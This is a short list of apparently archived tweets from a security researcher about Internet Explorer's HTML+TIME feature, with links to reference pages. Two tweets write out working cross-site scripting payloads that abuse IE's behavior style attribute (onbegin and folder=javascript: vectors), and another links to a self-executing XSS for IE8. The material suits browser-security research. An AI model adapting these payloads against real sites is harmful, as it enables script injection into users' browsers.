1. https://twitter.com/0x6D6172696F/status/7180793115:
Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>
2. https://twitter.com/0x6D6172696F/status/7196312532:
More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6
3. https://twitter.com/0x6D6172696F/status/7196350903:
XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>
4. https://twitter.com/0x6D6172696F/status/7197250108:
Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a
More info on HTML+TIME:
* http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
* http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
* http://www.w3.org/TR/NOTE-HTMLplusTIME